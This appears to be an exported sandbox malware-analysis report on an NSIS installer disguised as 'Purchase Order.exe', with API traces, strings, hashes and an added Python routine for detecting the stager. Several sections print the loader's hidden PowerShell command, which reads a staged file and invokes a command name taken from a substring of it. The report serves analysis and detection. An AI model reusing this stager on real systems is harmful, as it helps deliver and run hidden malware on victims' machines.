3997->3999 3998->3999 3999->3994 4000 402044 FreeLibrary 3999->4000 4000->3994 4001 401595 4002 402a3a 18 API calls 4001->4002 4003 40159c SetFileAttributesA 4002->4003 4004 4015ae 4003->4004 4005 402616 4006 40261d 4005->4006 4007 40287c 4005->4007 4008 402a1d 18 API calls 4006->4008 4009 402628 4008->4009 4010 40262f SetFilePointer 4009->4010 4010->4007 4011 40263f 4010->4011 4013 405c8d wsprintfA 4011->4013 4013->4007 3556 401717 3557 402a3a 18 API calls 3556->3557 3558 40171e SearchPathA 3557->3558 3559 401739 3558->3559 4014 402519 4015 40252e 4014->4015 4016 40251e 4014->4016 4017 402a3a 18 API calls 4015->4017 4018 402a1d 18 API calls 4016->4018 4019 402535 lstrlenA 4017->4019 4020 402527 4018->4020 4019->4020 4021 402557 4020->4021 4022 405a49 WriteFile 4020->4022 4022->4021 4023 40149d 4024 4014ab PostQuitMessage 4023->4024 4025 40226e 4023->4025 4024->4025 4026 4046a3 4027 4046b3 4026->4027 4028 4046cf 4026->4028 4037 405509 GetDlgItemTextA 4027->4037 4030 404702 4028->4030 4031 4046d5 SHGetPathFromIDListA 4028->4031 4033 4046e5 4031->4033 4036 4046ec SendMessageA 4031->4036 4032 4046c0 SendMessageA 4032->4028 4034 40140b 2 API calls 4033->4034 4034->4036 4036->4030 4037->4032 4038 401ca7 4039 402a1d 18 API calls 4038->4039 4040 401cae 4039->4040 4041 402a1d 18 API calls 4040->4041 4042 401cb6 GetDlgItem 4041->4042 4043 402513 4042->4043 4044 404028 lstrcpynA lstrlenA 3143 40192a 3144 40192c 3143->3144 3145 402a3a 18 API calls 3144->3145 3146 401931 3145->3146 3149 4055d1 3146->3149 3189 40588f 3149->3189 3152 405610 3157 40573e 3152->3157 3203 405d2f lstrcpynA 3152->3203 3153 4055f9 DeleteFileA 3154 40193a 3153->3154 3156 405636 3158 405649 3156->3158 3159 40563c lstrcatA 3156->3159 3157->3154 3160 406033 2 API calls 3157->3160 3204 4057e8 lstrlenA 3158->3204 3161 40564f 3159->3161 3164 405762 3160->3164 3163 40565d lstrcatA 3161->3163 3165 405668 lstrlenA FindFirstFileA 3161->3165 3163->3165 3164->3154 3166 405766 3164->3166 3165->3157 3171 40568c 
3165->3171 3217 4057a1 lstrlenA CharPrevA 3166->3217 3168 4057cc CharNextA 3168->3171 3170 405589 5 API calls 3172 405778 3170->3172 3171->3168 3176 40571d FindNextFileA 3171->3176 3185 4056de 3171->3185 3208 405d2f lstrcpynA 3171->3208 3173 405792 3172->3173 3174 40577c 3172->3174 3175 404f48 25 API calls 3173->3175 3174->3154 3179 404f48 25 API calls 3174->3179 3175->3154 3176->3171 3178 405735 FindClose 3176->3178 3178->3157 3180 405789 3179->3180 3181 405bea 38 API calls 3180->3181 3184 405790 3181->3184 3183 4055d1 62 API calls 3183->3185 3184->3154 3185->3176 3185->3183 3186 404f48 25 API calls 3185->3186 3187 404f48 25 API calls 3185->3187 3188 405bea 38 API calls 3185->3188 3209 405589 3185->3209 3186->3176 3187->3185 3188->3185 3220 405d2f lstrcpynA 3189->3220 3191 4058a0 3221 40583a CharNextA CharNextA 3191->3221 3194 4055f1 3194->3152 3194->3153 3195 405f9a 5 API calls 3201 4058b6 3195->3201 3196 4058e1 lstrlenA 3197 4058ec 3196->3197 3196->3201 3199 4057a1 3 API calls 3197->3199 3198 406033 2 API calls 3198->3201 3200 4058f1 GetFileAttributesA 3199->3200 3200->3194 3201->3194 3201->3196 3201->3198 3202 4057e8 2 API calls 3201->3202 3202->3196 3203->3156 3205 4057f5 3204->3205 3206 405806 3205->3206 3207 4057fa CharPrevA 3205->3207 3206->3161 3207->3205 3207->3206 3208->3171 3227 40597d GetFileAttributesA 3209->3227 3212 4055a4 RemoveDirectoryA 3214 4055b2 3212->3214 3213 4055ac DeleteFileA 3213->3214 3215 4055b6 3214->3215 3216 4055c2 SetFileAttributesA 3214->3216 3215->3185 3216->3215 3218 40576c 3217->3218 3219 4057bb lstrcatA 3217->3219 3218->3170 3219->3218 3220->3191 3222 405855 3221->3222 3225 405865 3221->3225 3223 405860 CharNextA 3222->3223 3222->3225 3226 405885 3223->3226 3224 4057cc CharNextA 3224->3225 3225->3224 3225->3226 3226->3194 3226->3195 3228 405595 3227->3228 3229 40598f SetFileAttributesA 3227->3229 3228->3212 3228->3213 3228->3215 3229->3228 4045 4028aa SendMessageA 4046 4028c4 InvalidateRect 4045->4046 4047 4028cf 4045->4047 
4046->4047 3530 4015b3 3531 402a3a 18 API calls 3530->3531 3532 4015ba 3531->3532 3533 40583a 4 API calls 3532->3533 3534 4015c2 3533->3534 3535 40161c 3534->3535 3536 4057cc CharNextA 3534->3536 3542 40548b 2 API calls 3534->3542 3545 4054a8 5 API calls 3534->3545 3546 4015eb 3534->3546 3547 401604 GetFileAttributesA 3534->3547 3537 401621 3535->3537 3538 40164a 3535->3538 3536->3534 3539 401423 25 API calls 3537->3539 3540 401423 25 API calls 3538->3540 3541 401628 3539->3541 3548 401642 3540->3548 3550 405d2f lstrcpynA 3541->3550 3542->3534 3544 401633 SetCurrentDirectoryA 3544->3548 3545->3534 3546->3534 3549 40540e 4 API calls 3546->3549 3547->3534 3549->3546 3550->3544 4048 4016b3 4049 402a3a 18 API calls 4048->4049 4050 4016b9 GetFullPathNameA 4049->4050 4051 4016d0 4050->4051 4052 4016f1 4050->4052 4051->4052 4055 406033 2 API calls 4051->4055 4053 401705 GetShortPathNameA 4052->4053 4054 4028cf 4052->4054 4053->4054 4056 4016e1 4055->4056 4056->4052 4058 405d2f lstrcpynA 4056->4058 4058->4052 4059 4014b7 4060 4014bd 4059->4060 4061 401389 2 API calls 4060->4061 4062 4014c5 4061->4062 4063 401d38 GetDC GetDeviceCaps 4064 402a1d 18 API calls 4063->4064 4065 401d56 MulDiv ReleaseDC 4064->4065 4066 402a1d 18 API calls 4065->4066 4067 401d75 4066->4067 4068 405d51 18 API calls 4067->4068 4069 401dae CreateFontIndirectA 4068->4069 4070 402513 4069->4070 4071 404ebc 4072 404ee0 4071->4072 4073 404ecc 4071->4073 4074 404ee8 IsWindowVisible 4072->4074 4082 404eff 4072->4082 4075 404ed2 4073->4075 4076 404f29 4073->4076 4074->4076 4077 404ef5 4074->4077 4079 403f60 SendMessageA 4075->4079 4078 404f2e CallWindowProcA 4076->4078 4080 404813 5 API calls 4077->4080 4081 404edc 4078->4081 4079->4081 4080->4082 4082->4078 4083 404893 4 API calls 4082->4083 4083->4076 4084 40173e 4085 402a3a 18 API calls 4084->4085 4086 401745 4085->4086 4087 4059d1 2 API calls 4086->4087 4088 40174c 4087->4088 4088->4088 4089 401ebe 4090 402a3a 18 API calls 4089->4090 4091 401ec5 
4090->4091 4092 406033 2 API calls 4091->4092 4093 401ecb 4092->4093 4095 401edd 4093->4095 4096 405c8d wsprintfA 4093->4096 4096->4095 4097 40193f 4098 402a3a 18 API calls 4097->4098 4099 401946 lstrlenA 4098->4099 4100 402513 4099->4100

                                                          Control-flow Graph
                                                          (Interactive graph-viewer data; the executed / not-executed colouring of the original is not preserved in this export.) Function 0040310F-004035CF: the NSIS installer entry point. Its basic blocks call the APIs listed below: stub initialisation (SetErrorMode, GetVersion, OleInitialize, SHGetFileInfoA, GetCommandLineA, GetModuleHandleA), the standard NSIS temp-directory selection (GetTempPathA, GetWindowsDirectoryA + "\Temp", the "Low" variant, then SetEnvironmentVariableA for TEMP and TMP), the normal exit path (OleUninitialize, ExitProcess, with an "Error launching installer" / "NSIS Error" MessageBoxIndirectA on failure) and the reboot path at 00403543-004035B4 (OpenProcessToken, LookupPrivilegeValueA for SeShutdownPrivilege, AdjustTokenPrivileges, ExitWindowsEx with EWX_REBOOT = 2). All of this is stock NSIS stub code; the installer script it runs is what launches the PowerShell stager named in the String ID below.
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403134
                                                          • GetVersion.KERNEL32 ref: 0040313A
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                          • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                          • OleInitialize.OLE32(00000000), ref: 0040318C
                                                          • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                          • GetCommandLineA.KERNEL32(Misguidingly Setup,NSIS Error), ref: 004031BD
                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 004031D0
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000020), ref: 004031FB
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • OleUninitialize.OLE32(?), ref: 0040340C
                                                          • ExitProcess.KERNEL32 ref: 0040342D
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                          • ExitProcess.KERNEL32 ref: 004035CF
                                                            • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                          • String ID: "$"$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$"C:\Users\user\Desktop\Purchase Order.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\potentially$C:\Users\user\AppData\Local\potentially\Avantgarders$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Low$Misguidingly Setup$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3329125770-2920167605
                                                          • Opcode ID: 7ee210cde1a7694cf5abc25b9eb613a289438676f60f8c8e8c044d7a1cf91141
                                                          • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                          • Opcode Fuzzy Hash: 7ee210cde1a7694cf5abc25b9eb613a289438676f60f8c8e8c044d7a1cf91141
                                                          • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                          Control-flow Graph
                                                          (Interactive graph-viewer data; colouring not preserved.) Function 00405086-00405409: the NSIS install-page dialog procedure. Its basic blocks lay out the details list view (GetDlgItem, GetClientRect, GetSystemMetrics and the LVM_* SendMessageA calls), start the installer thread (CreateThread on Function_0000501A) and implement the list view's context menu (CreatePopupMenu, AppendMenuA, TrackPopupMenu) that copies every log line to the clipboard (LVM_GETITEMTEXTA = 0x102D via SendMessageA, then OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, SetClipboardData, CloseClipboard). This is the stock NSIS "copy details to clipboard" feature, so the clipboard activity attributed to this function is the installer stub writing its own log, not payload behaviour.
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                          • GetClientRect.USER32(?,?), ref: 00405131
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                          • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                            • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040525B
                                                          • ShowWindow.USER32(00000000), ref: 0040527E
                                                          • ShowWindow.USER32(?,00000008), ref: 00405285
                                                          • ShowWindow.USER32(00000008), ref: 004052CB
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                          • CreatePopupMenu.USER32 ref: 00405310
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                          • OpenClipboard.USER32(00000000), ref: 004053AA
                                                          • EmptyClipboard.USER32 ref: 004053B0
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                          • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                          • CloseClipboard.USER32 ref: 00405401
                                                          Strings
                                                          • Misguidingly Setup: Installing, xrefs: 00405376
                                                          Memory Dump Source
                                                          • Same dump set as the function above: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true, with the associated 00400000-00449000 dumps.
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                          • String ID: Misguidingly Setup: Installing
                                                          • API String ID: 4154960007-1042532579
                                                          • Opcode ID: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                          • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                          • Opcode Fuzzy Hash: 178281be4e68d23ddcd88e799edc9527c790cc2d2363fcb1ed2671d56a5acb84
                                                          • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69

                                                          Control-flow Graph
                                                          (Interactive graph-viewer data; colouring not preserved.) Function 00405D51-00405F97: the NSIS string-expansion routine that resolves installer variables such as $SYSDIR, $WINDIR and the shell folders (GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, and lstrcatA of "\Microsoft\Internet Explorer\Quick Launch"). The captured arguments below show it expanding the log line Execute: "powershell.exe" -windowstyle hidden ..., i.e. the installer script's Exec/ExecWait instruction is what launches the PowerShell stager.
                                                          APIs
                                                          • GetVersion.KERNEL32(?,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,00404F80,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000), ref: 00405E02
                                                          • GetSystemDirectoryA.KERNEL32(Execute: ,00000400), ref: 00405E7D
                                                          • GetWindowsDirectoryA.KERNEL32(Execute: ,00000400), ref: 00405E90
                                                          • SHGetSpecialFolderLocation.SHELL32(?,0041859B), ref: 00405ECC
                                                          • SHGetPathFromIDListA.SHELL32(0041859B,Execute: ), ref: 00405EDA
                                                          • CoTaskMemFree.OLE32(0041859B), ref: 00405EE5
                                                          • lstrcatA.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                          • lstrlenA.KERNEL32(Execute: ,?,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,00404F80,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000), ref: 00405F59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$Execute: $Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-1703369495
                                                          • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                          • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                          • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                          • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
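The command line recorded in the GetVersion and lstrlenA xrefs above is the loader's PowerShell stager: it reads a file from the user's AppData\Local tree, takes a three-character substring at a fixed offset, and invokes that substring as a command with the whole file content as its argument, so the actual cmdlet name never appears on the command line. The following is an added example (not part of the Joe Sandbox report and not code from the sample) of a triage routine that recognises this Get-Content / SubString / dynamic-invoke chain in a command line and statically resolves which command the stub would call. The command line is the one from the trace; the payload file content is constructed here, since Epilogic.bac itself is not on this page, and all function and variable names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Command line recorded in the API trace above (the NSIS "Execute:" prefix stripped).
SAMPLE_CMDLINE = (
    'powershell.exe -windowstyle hidden "'
    "$Encloser=Get-Content 'C:\\Users\\user\\AppData\\Local\\potentially\\Avantgarders\\Epilogic.bac';"
    "$Gulvhjderne229=$Encloser.SubString(2901,3);"
    '.$Gulvhjderne229($Encloser)"'
)

# Constructed stand-in for the payload file (real content unknown): filler text with
# the three-character command name placed at the offset the stager reads.
CONSTRUCTED_PAYLOAD = ("x" * 2901) + "iex" + ("x" * 64)

# $var = Get-Content '<path>'
_GET_CONTENT = re.compile(r"\$(\w+)\s*=\s*Get-Content\s+'([^']+)'", re.IGNORECASE)
# $verb = $var.SubString(<offset>,<length>)
_SUBSTRING = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.IGNORECASE)
# .$verb($var)  or  &$verb($var): invoke a command whose name is held in a variable
_INVOKE = re.compile(r"[.&]\s*\$(\w+)\s*\(\s*\$(\w+)\s*\)")
# PowerShell accepts any unambiguous prefix of -WindowStyle; the class approximates that.
_HIDDEN = re.compile(r"-w[indowstyle]*\s+hidden", re.IGNORECASE)


@dataclass
class StagerMatch:
    payload_path: str
    offset: int
    length: int
    hidden: bool


def parse_stager(cmdline: str) -> Optional[StagerMatch]:
    """Return the stager parameters if the command line carries the full chain, else None.

    All three pieces must be present and linked by data flow: the variable filled by
    Get-Content must be the one SubString is taken from, and the SubString result must
    be the command that is invoked on that same content variable.
    """
    m_get, m_sub, m_inv = _GET_CONTENT.search(cmdline), _SUBSTRING.search(cmdline), _INVOKE.search(cmdline)
    if not (m_get and m_sub and m_inv):
        return None
    content_var, path = m_get.group(1).lower(), m_get.group(2)
    verb_var, src_var, offset, length = m_sub.groups()
    inv_verb, inv_arg = m_inv.groups()
    if src_var.lower() != content_var:
        return None
    if inv_verb.lower() != verb_var.lower() or inv_arg.lower() != content_var:
        return None
    return StagerMatch(path, int(offset), int(length), bool(_HIDDEN.search(cmdline)))


def resolve_invoked_command(match: StagerMatch, payload_text: str) -> str:
    """Compute the command name the stub would invoke, without executing anything.

    Get-Content without -Raw yields one string per line, so the stub's .SubString call
    only works on a single-line file; the offset therefore indexes into the first line.
    """
    first_line = payload_text.splitlines()[0] if payload_text else ""
    end = match.offset + match.length
    if end > len(first_line):
        raise ValueError("payload shorter than offset+length: wrong or truncated file")
    return first_line[match.offset:end]


def triage(cmdline: str) -> List[str]:
    """List the indicators found in a PowerShell command line (empty list: chain not present)."""
    m = parse_stager(cmdline)
    if m is None:
        return []
    reasons = ["command name read from a file at a fixed offset and invoked on that file's content"]
    if m.hidden:
        reasons.append("console window hidden")
    if not m.payload_path.lower().endswith(".ps1"):
        reasons.append("script body stored under a non-script extension")
    if "\\appdata\\local\\" in m.payload_path.lower():
        reasons.append("payload staged under the user's AppData\\Local tree")
    return reasons


if __name__ == "__main__":
    found = parse_stager(SAMPLE_CMDLINE)
    print(found)
    print("would invoke:", resolve_invoked_command(found, CONSTRUCTED_PAYLOAD))
    print("\n".join(triage(SAMPLE_CMDLINE)))
```

The data-flow check matters more than the individual patterns: `Get-Content` and `.SubString(` are common in legitimate scripts, but a substring of a file being used as the name of the command that then consumes the file is the stager's distinctive shape. The resolver only reads the file; it never hands the content to PowerShell.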

                                                           Control-flow Graph
                                                           Function at 4055d1 (rendered graph omitted; legend: Executed / Not Executed). Blocks 4055d1-40579e; API calls DeleteFileA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose; internal calls 40588f, 405d2f, 4057e8, 406033, 4057a1, 405589, 404f48, 405bea, 4057cc, 4055d1 (recursive, i.e. a recursive directory walk with "\*.*").
                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                          • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                          • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                          • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                          • FindFirstFileA.KERNELBASE(0042A870,?,?,?,00409014,?,0042A870,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                          • FindClose.KERNEL32(00000000), ref: 00405738
                                                          Strings
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 004055D1
                                                          • \*.*, xrefs: 0040563C
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-976342130
                                                          • Opcode ID: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                          • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                          • Opcode Fuzzy Hash: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                          • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                          APIs
